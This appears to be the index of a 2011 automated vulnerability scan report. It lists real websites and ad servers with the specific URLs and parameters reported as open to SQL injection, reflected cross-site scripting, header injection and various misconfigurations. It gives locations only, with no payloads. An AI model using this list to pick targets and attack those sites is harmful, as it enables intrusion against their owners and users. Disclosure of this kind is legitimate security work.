XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05032011-04

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Tue May 03 20:33:44 CDT 2011.


Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

Loading

1. SQL injection

1.1. http://ad.doubleclick.net/adi/N763.no_url_specifiedOX2462/B4639841.8 [name of an arbitrarily supplied request parameter]

1.2. http://ad.doubleclick.net/adi/N763.no_url_specifiedOX2462/B4639841.8 [sz parameter]

1.3. http://as.casalemedia.com/j [p parameter]

1.4. http://tag.contextweb.com/TagPublish/getad.aspx [tl parameter]

1.5. http://tag.contextweb.com/TagPublish/getjs.aspx [REST URL parameter 1]

1.6. http://www.aiche.org/favicon.ico [REST URL parameter 1]

1.7. http://www.aiche.org/favicon.ico [name of an arbitrarily supplied request parameter]

1.8. http://www.amateurfarm.net/favicon.ico [REST URL parameter 1]

1.9. http://www.amateurfarm.net/favicon.ico [name of an arbitrarily supplied request parameter]

1.10. http://www.divorcemag.com/favicon.ico [REST URL parameter 1]

1.11. http://www.divorcemag.com/favicon.ico [name of an arbitrarily supplied request parameter]

1.12. http://www.edison.com/favicon.ico [REST URL parameter 1]

1.13. http://www.expertsatellite.com/favicon.ico [name of an arbitrarily supplied request parameter]

1.14. http://www.infiniti.com/favicon.ico [REST URL parameter 1]

1.15. http://www.infiniti.com/favicon.ico [name of an arbitrarily supplied request parameter]

1.16. http://www.lvhn.org/favicon.ico [REST URL parameter 1]

1.17. http://www.mailfromftd.com/favicon.ico [REST URL parameter 1]

1.18. http://www.nativeoutdoors.com/favicon.ico [REST URL parameter 1]

1.19. http://www.nativeoutdoors.com/favicon.ico [name of an arbitrarily supplied request parameter]

1.20. http://www.needlepointers.com/favicon.ico [REST URL parameter 1]

1.21. http://www.osbornewood.com/favicon.ico [REST URL parameter 1]

1.22. http://www.payentry.com/favicon.ico [REST URL parameter 1]

1.23. http://www.state.de.us/favicon.ico [User-Agent HTTP header]

1.24. http://www.straight.com/favicon.ico [REST URL parameter 1]

1.25. http://www.thechildrenswearoutlet.com/favicon.ico [name of an arbitrarily supplied request parameter]

2. ASP.NET tracing enabled

2.1. http://www.allentate.com/trace.axd

2.2. http://www.endlessvacation.com/trace.axd

2.3. http://www.identitychecks.com/trace.axd

2.4. http://www.woodworking.com/trace.axd

3. XPath injection

4. HTTP PUT enabled

4.1. http://www.findire.com/favicon.ico

4.2. http://www.thenursingscholars.com/favicon.ico

5. HTTP header injection

5.1. http://ad.doubleclick.net/ad/tnews.lee.net/ [REST URL parameter 1]

5.2. http://ad.doubleclick.net/adi/N763.no_url_specifiedOX2462/B4639841.8 [REST URL parameter 1]

5.3. http://ad.doubleclick.net/adj/cm.rev_lee/ [REST URL parameter 1]

5.4. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [$ parameter]

5.5. http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js [$ parameter]

5.6. http://www.askdramy.com/favicon.ico [REST URL parameter 1]

5.7. http://www.grubhub.com/favicon.ico [REST URL parameter 1]

5.8. http://www.haircuttery.com/favicon.ico [REST URL parameter 1]

5.9. http://www.homebasedofficework.com/favicon.ico [REST URL parameter 1]

5.10. http://www.imaxenes.com/favicon.ico [REST URL parameter 1]

6. Cross-site scripting (reflected)

6.1. http://a.collective-media.net/adj/cm.rev_lee/ [REST URL parameter 2]

6.2. http://a.collective-media.net/adj/cm.rev_lee/ [name of an arbitrarily supplied request parameter]

6.3. http://a.collective-media.net/adj/cm.rev_lee/ [sz parameter]

6.4. http://ad.turn.com/server/pixel.htm [fpid parameter]

6.5. http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3]

6.6. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

6.7. http://ar.voicefive.com/b/rc.pli [func parameter]

6.8. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [$ parameter]

6.9. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [$ parameter]

6.10. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [$ parameter]

6.11. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [$ parameter]

6.12. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [q parameter]

6.13. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [q parameter]

6.14. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [q parameter]

6.15. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [q parameter]

6.16. http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js [$ parameter]

6.17. http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js [$ parameter]

6.18. http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js [q parameter]

6.19. http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js [q parameter]

6.20. http://ib.adnxs.com/ptj [redir parameter]

6.21. http://k.collective-media.net/cmadj/cm.rev_lee/ [REST URL parameter 2]

6.22. http://k.collective-media.net/cmadj/cm.rev_lee/ [sz parameter]

6.23. http://servedby.flashtalking.com/imp/3/15881 [124094;201;js;SpecificMedia;Target5DemoA3564ClevelandDMABT300x250/?click parameter]

6.24. http://servedby.flashtalking.com/imp/3/15881 [cachebuster parameter]

6.25. http://servedby.flashtalking.com/imp/3/15881 [ftadz parameter]

6.26. http://servedby.flashtalking.com/imp/3/15881 [ftscw parameter]

6.27. http://servedby.flashtalking.com/imp/3/15881 [ftx parameter]

6.28. http://servedby.flashtalking.com/imp/3/15881 [fty parameter]

6.29. http://servedby.flashtalking.com/imp/3/15881 [name of an arbitrarily supplied request parameter]

6.30. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]

6.31. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]

6.32. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]

6.33. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]

6.34. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]

6.35. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]

6.36. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]

6.37. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]

6.38. http://www.610wtvn.com/favicon.ico [REST URL parameter 1]

6.39. http://www.610wtvn.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.40. http://www.alvinisd.net/favicon.ico [REST URL parameter 1]

6.41. http://www.am570radio.com/favicon.ico [REST URL parameter 1]

6.42. http://www.am570radio.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.43. http://www.aquascapeonline.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.44. http://www.ashop.com.au/favicon.ico [name of an arbitrarily supplied request parameter]

6.45. http://www.bigtitcreampie.com/favicon.ico [REST URL parameter 1]

6.46. http://www.bigtitcreampie.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.47. http://www.bvonstyle.com/favicon.ico [REST URL parameter 1]

6.48. http://www.cashstore.com/favicon.ico [REST URL parameter 1]

6.49. http://www.cerritos.edu/favicon.ico [REST URL parameter 1]

6.50. http://www.churchleaderinsights.com/favicon.ico [REST URL parameter 1]

6.51. http://www.click-now.net/favicon.ico [name of an arbitrarily supplied request parameter]

6.52. http://www.coinmerc.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.53. http://www.diethealthclub.com/favicon.ico [REST URL parameter 1]

6.54. http://www.fluke.com/favicon.ico [REST URL parameter 1]

6.55. http://www.fluke.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.56. http://www.forconstructionpros.com/favicon.ico [REST URL parameter 1]

6.57. http://www.greatnow.com/favicon.ico [REST URL parameter 1]

6.58. http://www.greatnow.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.59. http://www.healthcarejobsite.com/favicon.ico [REST URL parameter 1]

6.60. http://www.healthiertalk.com/favicon.ico [REST URL parameter 1]

6.61. http://www.hollywoodpix.net/favicon.ico [REST URL parameter 1]

6.62. http://www.hollywoodpix.net/favicon.ico [REST URL parameter 1]

6.63. http://www.homegauge.com/favicon.ico [REST URL parameter 1]

6.64. http://www.hymnary.org/favicon.ico [REST URL parameter 1]

6.65. http://www.logicbuy.com/favicon.ico [REST URL parameter 1]

6.66. http://www.makefive.com/favicon.ico [REST URL parameter 1]

6.67. http://www.maysville-online.com/app/scripts/ajaxModules/'+upickemDeals[0][2]+' [REST URL parameter 1]

6.68. http://www.maysville-online.com/app/scripts/ajaxModules/'+upickemDeals[0][2]+' [REST URL parameter 1]

6.69. http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php [bg parameter]

6.70. http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php [countColor parameter]

6.71. http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php [headerBg parameter]

6.72. http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php [headerColor parameter]

6.73. http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php [upickemSignup parameter]

6.74. http://www.maysville-online.com/app/weather/qwikcast_feed0.xml [REST URL parameter 1]

6.75. http://www.maysville-online.com/app/weather/qwikcast_feed0.xml [REST URL parameter 1]

6.76. http://www.maysville-online.com/content/ [REST URL parameter 1]

6.77. http://www.maysville-online.com/content/ [REST URL parameter 1]

6.78. http://www.maysville-online.com/content/ [name of an arbitrarily supplied request parameter]

6.79. http://www.maysville-online.com/favicon.ico [REST URL parameter 1]

6.80. http://www.maysville-online.com/favicon.ico [REST URL parameter 1]

6.81. http://www.maysville-online.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.82. http://www.naturalhealers.com/favicon.ico [REST URL parameter 1]

6.83. http://www.naturalhealers.com/favicon.ico [REST URL parameter 1]

6.84. http://www.ntra.com/favicon.ico [REST URL parameter 1]

6.85. http://www.ontargetpayday.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.86. http://www.osbornewood.com/favicon.ico [REST URL parameter 1]

6.87. http://www.outsideinfo.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.88. http://www.pordeo.com/favicon.ico [REST URL parameter 1]

6.89. http://www.prosolutionpills.com/favicon.ico [REST URL parameter 1]

6.90. http://www.prosolutionpills.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.91. http://www.pusd.org/favicon.ico [REST URL parameter 1]

6.92. http://www.reflector.com/favicon.ico [REST URL parameter 1]

6.93. http://www.schneider.com/favicon.ico [REST URL parameter 1]

6.94. http://www.sport-tube.com/favicon.ico [REST URL parameter 1]

6.95. http://www.state-insurance-online.com/favicon.ico [REST URL parameter 1]

6.96. http://www.state-insurance-online.com/favicon.ico [REST URL parameter 1]

6.97. http://www.straight.com/favicon.ico [REST URL parameter 1]

6.98. http://www.thedailycat.com/favicon.ico [REST URL parameter 1]

6.99. http://www.thomann.de/favicon.ico [REST URL parameter 1]

6.100. http://www.tradearca.com/favicon.ico [REST URL parameter 1]

6.101. http://www.tradearca.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.102. http://www.travelagentcentral.com/favicon.ico [REST URL parameter 1]

6.103. http://www.travelagentcentral.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.104. http://www.upmystreet.com/favicon.ico [REST URL parameter 1]

6.105. http://www.vermontjoblink.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.106. http://www.vivareal.us/favicon.ico [REST URL parameter 1]

6.107. http://www.wdasfm.com/favicon.ico [REST URL parameter 1]

6.108. http://www.wdasfm.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.109. http://www.web-stat.net/favicon.ico [REST URL parameter 1]

6.110. http://www.webdesign.org/favicon.ico [REST URL parameter 1]

6.111. http://www.webdesign.org/favicon.ico [REST URL parameter 1]

6.112. http://www.wireless-driver.com/favicon.ico [REST URL parameter 1]

6.113. http://www.xcomment.com/favicon.ico [REST URL parameter 1]

6.114. http://www.xcomment.com/favicon.ico [REST URL parameter 1]

6.115. http://www.xcomment.com/favicon.ico [REST URL parameter 1]

6.116. http://www.xcomment.com/favicon.ico [REST URL parameter 1]

6.117. http://www.boomboomflicks.com/favicon.ico [Referer HTTP header]

6.118. http://www.freshpreservingstore.com/favicon.ico [User-Agent HTTP header]

6.119. http://www.prosolutionpills.com/favicon.ico [Referer HTTP header]

6.120. http://www.tradearca.com/favicon.ico [Referer HTTP header]

6.121. http://www.youngtubeclub.com/favicon.ico [Referer HTTP header]

6.122. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [FFpb cookie]

6.123. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [FFpb cookie]

6.124. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [ZEDOIDA cookie]

6.125. http://k.collective-media.net/cmadj/cm.rev_lee/ [cli cookie]

6.126. http://k.collective-media.net/cmadj/cm.rev_lee/ [cli cookie]

6.127. http://www.adaeveningnews.com/favicon.ico [REST URL parameter 1]

6.128. http://www.adaeveningnews.com/favicon.ico [REST URL parameter 1]

6.129. http://www.adaeveningnews.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.130. http://www.adaeveningnews.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.131. http://www.imaxenes.com/favicon.ico [REST URL parameter 1]

6.132. http://www.imaxenes.com/favicon.ico [REST URL parameter 1]

6.133. http://www.nextbigfuture.com/favicon.ico [REST URL parameter 1]

6.134. http://www.nextbigfuture.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.135. http://www.russianeuro.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.136. http://www.russianeuro.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.137. http://www.timeswv.com/favicon.ico [REST URL parameter 1]

6.138. http://www.timeswv.com/favicon.ico [REST URL parameter 1]

6.139. http://www.timeswv.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.140. http://www.timeswv.com/favicon.ico [name of an arbitrarily supplied request parameter]

7. Flash cross-domain policy

7.1. http://a.collective-media.net/crossdomain.xml

7.2. http://a.tribalfusion.com/crossdomain.xml

7.3. http://ad.doubleclick.net/crossdomain.xml

7.4. http://ad.turn.com/crossdomain.xml

7.5. http://ads.pointroll.com/crossdomain.xml

7.6. http://ads.specificmedia.com/crossdomain.xml

7.7. http://adserv.impactengine.com/crossdomain.xml

7.8. http://afe.specificclick.net/crossdomain.xml

7.9. http://aperture.displaymarketplace.com/crossdomain.xml

7.10. http://ar.voicefive.com/crossdomain.xml

7.11. http://as.casalemedia.com/crossdomain.xml

7.12. http://b.scorecardresearch.com/crossdomain.xml

7.13. http://b.voicefive.com/crossdomain.xml

7.14. http://bh.contextweb.com/crossdomain.xml

7.15. http://c.betrad.com/crossdomain.xml

7.16. http://c.yardbarker.com/crossdomain.xml

7.17. http://cache.specificmedia.com/crossdomain.xml

7.18. http://cdn.turn.com/crossdomain.xml

7.19. http://cms.quantserve.com/crossdomain.xml

7.20. http://d.xp1.ru4.com/crossdomain.xml

7.21. http://d13.zedo.com/crossdomain.xml

7.22. http://d3.zedo.com/crossdomain.xml

7.23. http://d7.zedo.com/crossdomain.xml

7.24. http://i.w55c.net/crossdomain.xml

7.25. http://ib.adnxs.com/crossdomain.xml

7.26. http://idpix.media6degrees.com/crossdomain.xml

7.27. http://img0.yardbarker.com/crossdomain.xml

7.28. http://img1.yardbarker.com/crossdomain.xml

7.29. http://img2.yardbarker.com/crossdomain.xml

7.30. http://img3.yardbarker.com/crossdomain.xml

7.31. http://k.collective-media.net/crossdomain.xml

7.32. http://l.betrad.com/crossdomain.xml

7.33. http://leeenterprises.112.2o7.net/crossdomain.xml

7.34. http://m1.zedo.com/crossdomain.xml

7.35. http://pixel.quantserve.com/crossdomain.xml

7.36. http://r.turn.com/crossdomain.xml

7.37. http://r1-ads.ace.advertising.com/crossdomain.xml

7.38. http://rs.gwallet.com/crossdomain.xml

7.39. http://servedby.flashtalking.com/crossdomain.xml

7.40. http://spe.atdmt.com/crossdomain.xml

7.41. http://speed.pointroll.com/crossdomain.xml

7.42. http://stat.flashtalking.com/crossdomain.xml

7.43. http://tags.bluekai.com/crossdomain.xml

7.44. http://turn.nexac.com/crossdomain.xml

7.45. http://www.610wtvn.com/crossdomain.xml

7.46. http://www.971zht.com/crossdomain.xml

7.47. http://www.977music.com/crossdomain.xml

7.48. http://www.air1.com/crossdomain.xml

7.49. http://www.am570radio.com/crossdomain.xml

7.50. http://www.artvoice.com/crossdomain.xml

7.51. http://www.axill.com/crossdomain.xml

7.52. http://www.big1059.com/crossdomain.xml

7.53. http://www.bikersingle.com/crossdomain.xml

7.54. http://www.boydgaming.com/crossdomain.xml

7.55. http://www.branditz.com/crossdomain.xml

7.56. http://www.broadbandsports.com/crossdomain.xml

7.57. http://www.builderonline.com/crossdomain.xml

7.58. http://www.buildlastingsuccess.com/crossdomain.xml

7.59. http://www.cariboucoffee.com/crossdomain.xml

7.60. http://www.carpictures.com/crossdomain.xml

7.61. http://www.cayenne.com/crossdomain.xml

7.62. http://www.centralmarket.com/crossdomain.xml

7.63. http://www.chamberorganizer.com/crossdomain.xml

7.64. http://www.chnlove.com/crossdomain.xml

7.65. http://www.coldplay.com/crossdomain.xml

7.66. http://www.collegeotr.com/crossdomain.xml

7.67. http://www.colony1.net/crossdomain.xml

7.68. http://www.contextads.net/crossdomain.xml

7.69. http://www.createfreepolls.com/crossdomain.xml

7.70. http://www.d2jsp.org/crossdomain.xml

7.71. http://www.daddario.com/crossdomain.xml

7.72. http://www.diesel.com/crossdomain.xml

7.73. http://www.dishant.com/crossdomain.xml

7.74. http://www.donbest.com/crossdomain.xml

7.75. http://www.dontstayin.com/crossdomain.xml

7.76. http://www.doublegames.com/crossdomain.xml

7.77. http://www.downy.com/crossdomain.xml

7.78. http://www.eventsinyuma.com/crossdomain.xml

7.79. http://www.exploregeorgia.org/crossdomain.xml

7.80. http://www.eyny.com/crossdomain.xml

7.81. http://www.findire.com/crossdomain.xml

7.82. http://www.firstresponse.com/crossdomain.xml

7.83. http://www.floorplanner.com/crossdomain.xml

7.84. http://www.forconstructionpros.com/crossdomain.xml

7.85. http://www.formrouter.net/crossdomain.xml

7.86. http://www.geckobyte.com/crossdomain.xml

7.87. http://www.goodbait.com/crossdomain.xml

7.88. http://www.h2onews.org/crossdomain.xml

7.89. http://www.helloatlanta.com/crossdomain.xml

7.90. http://www.house365.com/crossdomain.xml

7.91. http://www.hrs.com/crossdomain.xml

7.92. http://www.ihousenet.com/crossdomain.xml

7.93. http://www.imagetwist.com/crossdomain.xml

7.94. http://www.jackdaniels.com/crossdomain.xml

7.95. http://www.jumeirah.com/crossdomain.xml

7.96. http://www.justgiving.com/crossdomain.xml

7.97. http://www.kewego.fr/crossdomain.xml

7.98. http://www.kibagames.com/crossdomain.xml

7.99. http://www.kswo.com/crossdomain.xml

7.100. http://www.ktiv.com/crossdomain.xml

7.101. http://www.kwqc.com/crossdomain.xml

7.102. http://www.kzzp.com/crossdomain.xml

7.103. http://www.landsharklager.com/crossdomain.xml

7.104. http://www.littlebigplanet.com/crossdomain.xml

7.105. http://www.lotto.pl/crossdomain.xml

7.106. http://www.mapmyfitness.com/crossdomain.xml

7.107. http://www.maxadds.com/crossdomain.xml

7.108. http://www.maxdome.de/crossdomain.xml

7.109. http://www.mbrgames.com/crossdomain.xml

7.110. http://www.mercadolivre.com.br/crossdomain.xml

7.111. http://www.motorracingnetwork.com/crossdomain.xml

7.112. http://www.msgcu.org/crossdomain.xml

7.113. http://www.mydivadoll.com/crossdomain.xml

7.114. http://www.netminers.dk/crossdomain.xml

7.115. http://www.nowness.com/crossdomain.xml

7.116. http://www.osobnosti.cz/crossdomain.xml

7.117. http://www.outsidethebeltway.com/crossdomain.xml

7.118. http://www.paintthe88.com/crossdomain.xml

7.119. http://www.pentaximaging.com/crossdomain.xml

7.120. http://www.playingforchange.com/crossdomain.xml

7.121. http://www.playmymovs.com/crossdomain.xml

7.122. http://www.playsportstv.com/crossdomain.xml

7.123. http://www.podfeed.net/crossdomain.xml

7.124. http://www.pordeo.com/crossdomain.xml

7.125. http://www.ppcgeeks.com/crossdomain.xml

7.126. http://www.princesshouse.com/crossdomain.xml

7.127. http://www.royalvegas.eu/crossdomain.xml

7.128. http://www.rp-online.de/crossdomain.xml

7.129. http://www.sekindo.com/crossdomain.xml

7.130. http://www.sfgotobat.com/crossdomain.xml

7.131. http://www.sheezyart.com/crossdomain.xml

7.132. http://www.skullcandy.com/crossdomain.xml

7.133. http://www.smartvideochannel.com/crossdomain.xml

7.134. http://www.songselect.com/crossdomain.xml

7.135. http://www.splashup.com/crossdomain.xml

7.136. http://www.thecampuscommon.com/crossdomain.xml

7.137. http://www.theevonywiki.com/crossdomain.xml

7.138. http://www.themag12.com/crossdomain.xml

7.139. http://www.themat.com/crossdomain.xml

7.140. http://www.thomann.de/crossdomain.xml

7.141. http://www.ticketleap.net/crossdomain.xml

7.142. http://www.towsontigers.com/crossdomain.xml

7.143. http://www.traxnyc.com/crossdomain.xml

7.144. http://www.truthin2010.org/crossdomain.xml

7.145. http://www.tubeguide.info/crossdomain.xml

7.146. http://www.tunecore.com/crossdomain.xml

7.147. http://www.tvb.com/crossdomain.xml

7.148. http://www.twilightersanonymous.com/crossdomain.xml

7.149. http://www.verawang.com/crossdomain.xml

7.150. http://www.vertadnet.com/crossdomain.xml

7.151. http://www.vladtod.com/crossdomain.xml

7.152. http://www.wdasfm.com/crossdomain.xml

7.153. http://www.we7.com/crossdomain.xml

7.154. http://www.wect.com/crossdomain.xml

7.155. http://www.weebls-stuff.com/crossdomain.xml

7.156. http://www.wildfanny.com/crossdomain.xml

7.157. http://www.wowtattoos.com/crossdomain.xml

7.158. http://www.wten.com/crossdomain.xml

7.159. http://www.yardbarker.com/crossdomain.xml

7.160. http://www.yournewenglandforddealer.com/crossdomain.xml

7.161. http://ads.adbrite.com/crossdomain.xml

7.162. http://cookex.amp.yahoo.com/crossdomain.xml

7.163. http://feeds.bbci.co.uk/crossdomain.xml

7.164. http://newsrss.bbc.co.uk/crossdomain.xml

7.165. http://open.ad.yieldmanager.net/crossdomain.xml

7.166. http://www.126.com/crossdomain.xml

7.167. http://www.accu-chek.com/crossdomain.xml

7.168. http://www.actonsoftware.com/crossdomain.xml

7.169. http://www.allbran.com/crossdomain.xml

7.170. http://www.b92.net/crossdomain.xml

7.171. http://www.bimvid.com/crossdomain.xml

7.172. http://www.bookmaker.com/crossdomain.xml

7.173. http://www.bowtecharchery.com/crossdomain.xml

7.174. http://www.burton.com/crossdomain.xml

7.175. http://www.bvonstyle.com/crossdomain.xml

7.176. http://www.carnivalmagic.com/crossdomain.xml

7.177. http://www.citrix.com/crossdomain.xml

7.178. http://www.classicwordgames.com/crossdomain.xml

7.179. http://www.clubpogo.com/crossdomain.xml

7.180. http://www.ctnow.com/crossdomain.xml

7.181. http://www.ebay.pl/crossdomain.xml

7.182. http://www.ellusionist.com/crossdomain.xml

7.183. http://www.eluniversal.com/crossdomain.xml

7.184. http://www.facebook.com/crossdomain.xml

7.185. http://www.gadsdentimes.com/crossdomain.xml

7.186. http://www.giftcards.com/crossdomain.xml

7.187. http://www.hepsiburada.com/crossdomain.xml

7.188. http://www.hgvclub.com/crossdomain.xml

7.189. http://www.homeawayrealestate.com/crossdomain.xml

7.190. http://www.jaguar.com/crossdomain.xml

7.191. http://www.jameshardie.com/crossdomain.xml

7.192. http://www.kerpoof.com/crossdomain.xml

7.193. http://www.kidk.com/crossdomain.xml

7.194. http://www.kjct8.com/crossdomain.xml

7.195. http://www.kxlh.com/crossdomain.xml

7.196. http://www.lacoste.com/crossdomain.xml

7.197. http://www.lasalle.edu/crossdomain.xml

7.198. http://www.launchfire.com/crossdomain.xml

7.199. http://www.lespac.com/crossdomain.xml

7.200. http://www.marca.com/crossdomain.xml

7.201. http://www.mikesbikes.com/crossdomain.xml

7.202. http://www.minglehouse.com/crossdomain.xml

7.203. http://www.monica.com/crossdomain.xml

7.204. http://www.mtv.ca/crossdomain.xml

7.205. http://www.nin.com/crossdomain.xml

7.206. http://www.northerntrust.com/crossdomain.xml

7.207. http://www.nu.nl/crossdomain.xml

7.208. http://www.o.biz/crossdomain.xml

7.209. http://www.oregonlotteryloyalty.org/crossdomain.xml

7.210. http://www.our-hometown.com/crossdomain.xml

7.211. http://www.palacenet.com/crossdomain.xml

7.212. http://www.playtech.com/crossdomain.xml

7.213. http://www.portableairshop.com/crossdomain.xml

7.214. http://www.raylamontagne.com/crossdomain.xml

7.215. http://www.realbird.com/crossdomain.xml

7.216. http://www.reflector.com/crossdomain.xml

7.217. http://www.ryland.com/crossdomain.xml

7.218. http://www.samashmusic.com/crossdomain.xml

7.219. http://www.saukvalley.com/crossdomain.xml

7.220. http://www.schuelervz.net/crossdomain.xml

7.221. http://www.sleepconnect.com/crossdomain.xml

7.222. http://www.socializr.com/crossdomain.xml

7.223. http://www.spankwireinhd.com/crossdomain.xml

7.224. http://www.sub5zero.com/crossdomain.xml

7.225. http://www.superstreetonline.com/crossdomain.xml

7.226. http://www.swvatoday.com/crossdomain.xml

7.227. http://www.targetcenter.com/crossdomain.xml

7.228. http://www.tbd.com/crossdomain.xml

7.229. http://www.the39clues.com/crossdomain.xml

7.230. http://www.thefwa.com/crossdomain.xml

7.231. http://www.trade2win.com/crossdomain.xml

7.232. http://www.tradearca.com/crossdomain.xml

7.233. http://www.ualmileageplus.com/crossdomain.xml

7.234. http://www.uniqlo.com/crossdomain.xml

7.235. http://www.urbanministry.org/crossdomain.xml

7.236. http://www.usa-gymnastics.org/crossdomain.xml

7.237. http://www.usafootball.com/crossdomain.xml

7.238. http://www.usfunds.com/crossdomain.xml

7.239. http://www.webcampromotions.com/crossdomain.xml

7.240. http://www.wofford.edu/crossdomain.xml

7.241. http://www.woodsmith.com/crossdomain.xml

7.242. http://www.xstreetsl.com/crossdomain.xml

7.243. http://www.zapak.com/crossdomain.xml

7.244. http://www.zdnetasia.com/crossdomain.xml

7.245. http://www.zegeridotc.com/crossdomain.xml

7.246. http://www.123-reg.co.uk/crossdomain.xml

7.247. http://www.20minutos.es/crossdomain.xml

7.248. http://www.adddev2.com/crossdomain.xml

7.249. http://www.avaloncommunities.com/crossdomain.xml

7.250. http://www.bhgrealestate.com/crossdomain.xml

7.251. http://www.boomkat.com/crossdomain.xml

7.252. http://www.coahomacc.edu/crossdomain.xml

7.253. http://www.costore.com/crossdomain.xml

7.254. http://www.doctorswithoutborders.org/crossdomain.xml

7.255. http://www.donga.com/crossdomain.xml

7.256. http://www.eaglesband.com/crossdomain.xml

7.257. http://www.emporia.edu/crossdomain.xml

7.258. http://www.figures.com/crossdomain.xml

7.259. http://www.firstweber.com/crossdomain.xml

7.260. http://www.fly2houston.com/crossdomain.xml

7.261. http://www.fvtc.edu/crossdomain.xml

7.262. http://www.hostesscakes.com/crossdomain.xml

7.263. http://www.idahopress.com/crossdomain.xml

7.264. http://www.indianagazette.com/crossdomain.xml

7.265. http://www.jimmyjohns.com/crossdomain.xml

7.266. http://www.justjigsawpuzzles.com/crossdomain.xml

7.267. http://www.kspr.com/crossdomain.xml

7.268. http://www.lattc.edu/crossdomain.xml

7.269. http://www.lightreading.com/crossdomain.xml

7.270. http://www.market4free.com/crossdomain.xml

7.271. http://www.maysville-online.com/crossdomain.xml

7.272. http://www.mrclean.com/crossdomain.xml

7.273. http://www.myepets.com/crossdomain.xml

7.274. http://www.neaq.org/crossdomain.xml

7.275. http://www.neatco.com/crossdomain.xml

7.276. http://www.pecentral.org/crossdomain.xml

7.277. http://www.primos.com/crossdomain.xml

7.278. http://www.rifftrax.com/crossdomain.xml

7.279. http://www.samstowntunica.com/crossdomain.xml

7.280. http://www.scott-sports.com/crossdomain.xml

7.281. http://www.stjohnprovidence.org/crossdomain.xml

7.282. http://www.supermotors.net/crossdomain.xml

7.283. http://www.theknackkids.com/crossdomain.xml

7.284. http://www.virtualrabbit.com/crossdomain.xml

7.285. http://www.wendoverfun.com/crossdomain.xml

8. Silverlight cross-domain policy

8.1. http://ad.doubleclick.net/clientaccesspolicy.xml

8.2. http://ads.pointroll.com/clientaccesspolicy.xml

8.3. http://b.scorecardresearch.com/clientaccesspolicy.xml

8.4. http://b.voicefive.com/clientaccesspolicy.xml

8.5. http://c.yardbarker.com/clientaccesspolicy.xml

8.6. http://leeenterprises.112.2o7.net/clientaccesspolicy.xml

8.7. http://spe.atdmt.com/clientaccesspolicy.xml

8.8. http://speed.pointroll.com/clientaccesspolicy.xml

8.9. http://www.blueangels.navy.mil/clientaccesspolicy.xml

8.10. http://www.chessbase.com/clientaccesspolicy.xml

8.11. http://www.maxdome.de/clientaccesspolicy.xml

8.12. http://www.towsontigers.com/clientaccesspolicy.xml

8.13. http://www.marca.com/clientaccesspolicy.xml

8.14. http://www.montgomerycountytn.org/clientaccesspolicy.xml

9. Cleartext submission of password

9.1. http://www.ascp.org/favicon.ico

9.2. http://www.bikersingle.com/favicon.ico

9.3. http://www.extrabux.com/favicon.ico

9.4. http://www.restaurantrow.com/favicon.ico

9.5. http://www.voa.org/favicon.ico

9.6. http://www.xcomment.com/favicon.ico

9.7. http://www.xcomment.com/favicon.ico

10. Session token in URL

10.1. http://www.facebook.com/extern/login_status.php

10.2. http://www.methodisthealth.org/favicon.ico

10.3. http://www.vc.edu/favicon.ico

11. ASP.NET ViewState without MAC enabled

11.1. http://www.ashop.com.au/favicon.ico

11.2. http://www.findire.com/favicon.ico

12. Cookie scoped to parent domain

12.1. http://www.atomiclearning.com/favicon.ico

12.2. http://www.thelaughtermovie.com/favicon.ico

12.3. http://www.ticketleap.net/favicon.ico

12.4. http://www.tireteam.com/favicon.ico

